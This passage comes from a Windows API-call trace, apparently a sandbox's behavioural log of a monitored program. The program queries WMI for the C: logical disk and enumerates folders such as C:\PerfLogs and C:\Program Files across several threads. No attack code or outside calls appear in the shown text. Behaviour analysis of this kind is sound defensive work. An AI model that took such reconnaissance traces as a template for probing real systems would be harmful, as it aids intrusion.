ppvObject=0x69de568*=0x0) returned 0x80004002 [0212.592] WbemLocator:IUnknown:Release (This=0x6737128) returned 0x2 [0212.592] WbemLocator:IUnknown:Release (This=0x6737128) returned 0x1 [0212.592] CoGetContextToken (in: pToken=0x69deb48 | out: pToken=0x69deb48) returned 0x0 [0212.592] CoGetContextToken (in: pToken=0x69deaa8 | out: pToken=0x69deaa8) returned 0x0 [0212.592] WbemLocator:IUnknown:QueryInterface (in: This=0x6737128, riid=0x69deb78*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x69deb74 | out: ppvObject=0x69deb74*=0x6737128) returned 0x0 [0212.593] WbemLocator:IUnknown:AddRef (This=0x6737128) returned 0x3 [0212.593] WbemLocator:IUnknown:Release (This=0x6737128) returned 0x2 [0212.593] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67382a0, puCount=0x69ded0c | out: puCount=0x69ded0c*=0x2) returned 0x0 [0212.593] WbemDefPath:IWbemPath:GetText (in: This=0x67382a0, lFlags=8, puBuffLength=0x69ded08*=0x0, pszText=0x0 | out: puBuffLength=0x69ded08*=0xf, pszText=0x0) returned 0x0 [0212.593] WbemDefPath:IWbemPath:GetText (in: This=0x67382a0, lFlags=8, puBuffLength=0x69ded08*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded08*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.593] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x69debe4 | out: ppv=0x69debe4*=0x6736f78) returned 0x0 [0212.593] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736f78, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x69dec78 | out: ppNamespace=0x69dec78*=0x674841c) returned 0x0 [0216.724] WbemLocator:IUnknown:QueryInterface (in: This=0x674841c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb14 | out: ppvObject=0x69deb14*=0x781184) returned 0x0 [0216.724] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781184, pProxy=0x674841c, pAuthnSvc=0x69deb64, pAuthzSvc=0x69deb60, pServerPrincName=0x69deb58, pAuthnLevel=0x69deb5c, pImpLevel=0x69deb4c, pAuthInfo=0x69deb50, pCapabilites=0x69deb54 | out: pAuthnSvc=0x69deb64*=0xa, pAuthzSvc=0x69deb60*=0x0, pServerPrincName=0x69deb58, pAuthnLevel=0x69deb5c*=0x6, pImpLevel=0x69deb4c*=0x2, pAuthInfo=0x69deb50, pCapabilites=0x69deb54*=0x1) returned 0x0 [0216.724] WbemLocator:IUnknown:Release (This=0x781184) returned 0x1 [0216.724] WbemLocator:IUnknown:QueryInterface (in: This=0x674841c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb08 | out: ppvObject=0x69deb08*=0x7811a4) returned 0x0 [0216.725] WbemLocator:IUnknown:QueryInterface (in: This=0x674841c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb04 | out: ppvObject=0x69deb04*=0x781184) returned 0x0 [0216.725] WbemLocator:IClientSecurity:SetBlanket (This=0x781184, pProxy=0x674841c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0216.725] WbemLocator:IUnknown:Release (This=0x781184) returned 0x2 [0216.725] WbemLocator:IUnknown:Release (This=0x7811a4) returned 0x1 [0216.725] CoTaskMemFree (pv=0x77df98) [0216.725] WbemLocator:IUnknown:Release (This=0x6736f78) returned 0x0 [0216.725] WbemLocator:IUnknown:QueryInterface (in: This=0x674841c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de704 | out: ppvObject=0x69de704*=0x7811a4) returned 0x0 [0216.725] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de6c0 | out: ppvObject=0x69de6c0*=0x0) returned 0x80004002 [0216.727] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de4dc | out: ppvObject=0x69de4dc*=0x0) returned 0x80004002 [0216.729] WbemLocator:IUnknown:AddRef (This=0x7811a4) returned 0x3 [0216.729] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69de01c | out: ppvObject=0x69de01c*=0x0) returned 0x80004002 [0216.730] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69ddfcc | out: ppvObject=0x69ddfcc*=0x0) returned 0x80004002 [0216.738] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69ddfd8 | out: ppvObject=0x69ddfd8*=0x781104) returned 0x0 [0216.738] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781104, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69ddfe0 | out: pCid=0x69ddfe0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0216.738] WbemLocator:IUnknown:Release (This=0x781104) returned 0x3 [0216.738] CoGetContextToken (in: pToken=0x69de038 | out: pToken=0x69de038) returned 0x0 [0216.738] CoGetContextToken (in: pToken=0x69de440 | out: pToken=0x69de440) returned 0x0 [0216.739] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de4d0 | out: ppvObject=0x69de4d0*=0x78118c) returned 0x0 [0216.739] WbemLocator:IRpcOptions:Query (in: This=0x78118c, pPrx=0x7811a4, dwProperty=2, pdwValue=0x69de4f8 | out: pdwValue=0x69de4f8) returned 0x80004002 [0216.739] WbemLocator:IUnknown:Release (This=0x78118c) returned 0x3 [0216.739] WbemLocator:IUnknown:Release (This=0x7811a4) returned 0x2 [0216.739] CoGetContextToken (in: pToken=0x69dea18 | out: pToken=0x69dea18) returned 0x0 [0216.739] CoGetContextToken (in: pToken=0x69de978 | out: pToken=0x69de978) returned 0x0 [0216.739] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x69dea48*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x69dea44 | out: ppvObject=0x69dea44*=0x674841c) returned 0x0 [0216.739] WbemLocator:IUnknown:AddRef (This=0x674841c) returned 0x4 [0216.739] WbemLocator:IUnknown:Release (This=0x674841c) returned 0x3 [0216.739] WbemLocator:IUnknown:Release (This=0x674841c) returned 0x2 [0216.739] SysStringLen (param_1=0x0) returned 0x0 [0216.739] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67384d0, puCount=0x69deddc | out: puCount=0x69deddc*=0x0) returned 0x0 [0216.739] WbemDefPath:IWbemPath:GetText (in: This=0x67384d0, lFlags=2, puBuffLength=0x69dedd8*=0x0, pszText=0x0 | out: puBuffLength=0x69dedd8*=0x20, pszText=0x0) returned 0x0 [0216.739] WbemDefPath:IWbemPath:GetText (in: This=0x67384d0, lFlags=2, puBuffLength=0x69dedd8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dedd8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0216.739] CoGetContextToken (in: pToken=0x69dea48 | out: pToken=0x69dea48) returned 0x0 [0216.739] WbemLocator:IUnknown:AddRef (This=0x7811a4) returned 0x3 [0216.739] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de8dc | out: ppvObject=0x69de8dc*=0x7811a4) returned 0x0 [0216.739] WbemLocator:IUnknown:Release (This=0x7811a4) returned 0x3 [0216.739] WbemLocator:IUnknown:Release (This=0x7811a4) returned 0x2 [0216.739] WbemDefPath:IWbemPath:GetText (in: This=0x67384d0, lFlags=2, puBuffLength=0x69dede0*=0x0, pszText=0x0 | out: puBuffLength=0x69dede0*=0x20, pszText=0x0) returned 0x0 [0216.739] WbemDefPath:IWbemPath:GetText (in: This=0x67384d0, lFlags=2, puBuffLength=0x69dede0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dede0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0216.740] IWbemServices:GetObject (This=0x674841c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x69ded94*=0x0, ppCallResult=0x0) Thread: id = 131 os_tid = 0x7d4 [0131.357] SysReAllocStringLen (in: pbstr=0x6c1f5a4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6c1f5a4*="KERNEL32.DLL") returned 1 [0131.357] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.358] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.360] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.361] SysReAllocStringLen (in: pbstr=0x6c1f5a4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6c1f5a4*="KERNEL32.DLL") returned 1 [0131.361] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.361] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.364] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.364] SysReAllocStringLen (in: pbstr=0x6c1f580*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6c1f580*="KERNEL32.DLL") returned 1 [0131.364] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.365] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.367] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0131.370] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.371] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0131.372] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c1f0cc) returned 1 [0131.372] GetFullPathNameW (in: lpFileName="C:\\PerfLogs", nBufferLength=0x105, lpBuffer=0x6c1ebd4, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs", lpFilePart=0x0) returned 0xb [0131.372] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\", nBufferLength=0x105, lpBuffer=0x6c1eba8, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\", lpFilePart=0x0) returned 0xc [0131.372] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x6c1edf4 | out: lpFindFileData=0x6c1edf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ac30 [0131.372] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6c1ee04 | out: lpFindFileData=0x6c1ee04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.373] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6c1ee04 | out: lpFindFileData=0x6c1ee04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0131.373] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6c1ee04 | out: lpFindFileData=0x6c1ee04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 0 [0131.373] FindClose (in: hFindFile=0x77ac30 | out: hFindFile=0x77ac30) returned 1 [0131.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c1f08c) returned 1 [0131.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c1f098) returned 1 [0131.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c1f0cc) returned 1 [0131.373] GetFullPathNameW (in: lpFileName="C:\\PerfLogs", nBufferLength=0x105, lpBuffer=0x6c1ebd4, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs", lpFilePart=0x0) returned 0xb [0131.373] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\", nBufferLength=0x105, lpBuffer=0x6c1eba8, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\", lpFilePart=0x0) returned 0xc [0131.373] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x6c1edf4 | out: lpFindFileData=0x6c1edf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ac30 [0131.374] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6c1ee04 | out: lpFindFileData=0x6c1ee04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.374] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6c1ee04 | out: lpFindFileData=0x6c1ee04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0131.374] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6c1ee04 | out: lpFindFileData=0x6c1ee04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.374] FindClose (in: hFindFile=0x77ac30 | out: hFindFile=0x77ac30) returned 1 [0131.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c1f08c) returned 1 [0131.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c1f098) returned 1 [0131.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c1f07c) returned 1 [0131.375] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin", nBufferLength=0x105, lpBuffer=0x6c1eb84, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin", lpFilePart=0x0) returned 0x11 [0131.375] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin\\", nBufferLength=0x105, lpBuffer=0x6c1eb58, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin\\", lpFilePart=0x0) returned 0x12 [0131.375] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*", lpFindFileData=0x6c1eda4 | out: lpFindFileData=0x6c1eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ac30 [0131.375] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6c1edb4 | out: lpFindFileData=0x6c1edb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.375] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6c1edb4 | out: lpFindFileData=0x6c1edb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0131.376] FindClose (in: hFindFile=0x77ac30 | out: hFindFile=0x77ac30) returned 1 [0131.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c1f03c) returned 1 [0131.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c1f048) returned 1 [0131.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c1f07c) returned 1 [0131.376] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin", nBufferLength=0x105, lpBuffer=0x6c1eb84, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin", lpFilePart=0x0) returned 0x11 [0131.376] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin\\", nBufferLength=0x105, lpBuffer=0x6c1eb58, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin\\", lpFilePart=0x0) returned 0x12 [0131.376] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*", lpFindFileData=0x6c1eda4 | out: lpFindFileData=0x6c1eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ac30 [0131.376] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6c1edb4 | out: lpFindFileData=0x6c1edb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.376] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6c1edb4 | out: lpFindFileData=0x6c1edb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0131.376] FindClose (in: hFindFile=0x77ac30 | out: hFindFile=0x77ac30) returned 1 [0131.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c1f03c) returned 1 [0131.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c1f048) returned 1 [0131.377] CoUninitialize () [0131.378] SysReAllocStringLen (in: pbstr=0x6c1f858*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6c1f858*="KERNEL32.DLL") returned 1 [0131.378] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.379] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.381] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 132 os_tid = 0xb04 [0131.431] SysReAllocStringLen (in: pbstr=0x6bcf5b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6bcf5b4*="KERNEL32.DLL") returned 1 [0131.431] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.432] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.434] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.435] SysReAllocStringLen (in: pbstr=0x6bcf5b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6bcf5b4*="KERNEL32.DLL") returned 1 [0131.435] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.435] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.438] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.438] SysReAllocStringLen (in: pbstr=0x6bcf590*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6bcf590*="KERNEL32.DLL") returned 1 [0131.438] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.439] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.441] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0131.444] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.445] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0131.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcf05c) returned 1 [0131.445] GetFullPathNameW (in: lpFileName="C:\\Program Files", nBufferLength=0x105, lpBuffer=0x6bceb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files", lpFilePart=0x0) returned 0x10 [0131.445] GetFullPathNameW (in: lpFileName="C:\\Program Files\\", nBufferLength=0x105, lpBuffer=0x6bceb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\", lpFilePart=0x0) returned 0x11 [0131.445] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x6bced84 | out: lpFindFileData=0x6bced84*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe0a0d1e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0a0d1e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ac30 [0131.446] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe0a0d1e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0a0d1e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.446] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, 